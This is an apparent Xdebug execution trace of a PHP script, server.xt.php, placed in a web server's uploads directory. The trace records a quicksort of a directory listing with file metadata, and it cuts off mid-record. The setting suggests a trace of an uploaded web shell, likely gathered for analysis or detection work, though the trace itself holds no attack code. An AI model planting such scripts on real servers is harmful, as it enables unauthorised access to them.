4		A						/var/www/html/uploads/server.xt.php	937	$r--
4		A						/var/www/html/uploads/server.xt.php	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.xt.php	942	$array[0] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.xt.php	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.xt.php	945	$l++
4		A						/var/www/html/uploads/server.xt.php	946	$r--
5	192	0	0.010097	800816	quicksort	1		/var/www/html/uploads/server.xt.php	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	0	'filename'
5	192	1	0.010141	800816
5	193	0	0.010149	800816	quicksort	1		/var/www/html/uploads/server.xt.php	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	2	'filename'
6	194	0	0.010192	800816	floor	0		/var/www/html/uploads/server.xt.php	929	1	1.5
6	194	1	0.010205	800848
6	194	R			1
5		A						/var/www/html/uploads/server.xt.php	929	$cmp = '..'
5		A						/var/www/html/uploads/server.xt.php	931	$l = 1
5		A						/var/www/html/uploads/server.xt.php	932	$r = 2
5		A						/var/www/html/uploads/server.xt.php	937	$r--
5		A						/var/www/html/uploads/server.xt.php	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/server.xt.php	942	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/server.xt.php	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/server.xt.php	945	$l++
5		A						/var/www/html/uploads/server.xt.php	946	$r--
6	195	0	0.010350	800816	quicksort	1		/var/www/html/uploads/server.xt.php	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	0	'filename'
6	195	1	0.010394	800816
6	196	0	0.010401	800816	quicksort	1		/var/www/html/uploads/server.xt.php	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	2	2	'filename'
6	196	1	0.010445	800816
5	193	1	0.010452	800816
4	190	1	0.010459	800816
4	197	0	0.010467	800840	sizeof	0		/var/www/html/uploads/server.xt.php	918	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	197	1	0.010513	800872
4	197	R			3
4	198	0	0.010526	800840	quicksort	1		/var/www/html/uploads/server.xt.php	918	4	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	199	0	0.010571	800840	floor	0		/var/www/html/uploads/server.xt.php	929	1	1
5	199	1	0.010583	800872
5	199	R			1
4		A						/var/www/html/uploads/server.xt.php	929	$cmp = 'prepend.php'
4		A						/var/www/html/uploads/server.xt.php	931	$l = 0
4		A						/var/www/html/uploads/server.xt.php	932	$r = 2
4		A						/var/www/html/uploads/server.xt.php	941	$tmp = ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4		A						/var/www/html/uploads/server.xt.php	942	$array[0] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.xt.php	943	$array[2] = ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4		A						/var/www/html/uploads/server.xt.php	945	$l++
4		A						/var/www/html/uploads/server.xt.php	946	$r--
4		A						/var/www/html/uploads/server.xt.php	941	$tmp = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.xt.php	942	$array[1] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.xt.php	943	$array[1] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.xt.php	945	$l++
4		A						/var/www/html/uploads/server.xt.php	946	$r--
5	200	0	0.010826	800840	quicksort	1		/var/www/html/uploads/server.xt.php	952	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]	0	0	'filename'
5	200	1	0.010874	800840
5	201	0	0.010881	800840	quicksort	1		/var/www/html/uploads/server.xt.php	953	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]	2	2	'filename'
5	201	1	0.010926	800840
4	198	1	0.010934	800840
4	202	0	0.010942	800840	array_merge	0		/var/www/html/uploads/server.xt.php	921	2	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	202	1	0.011013	801280
4	202	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
3	181	1	0.011086	800416
3	181	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
2		A						/var/www/html/uploads/server.xt.php	1213	$list = [0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
3	203	0	0.011224	800040	listing	1		/var/www/html/uploads/server.xt.php	1214	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 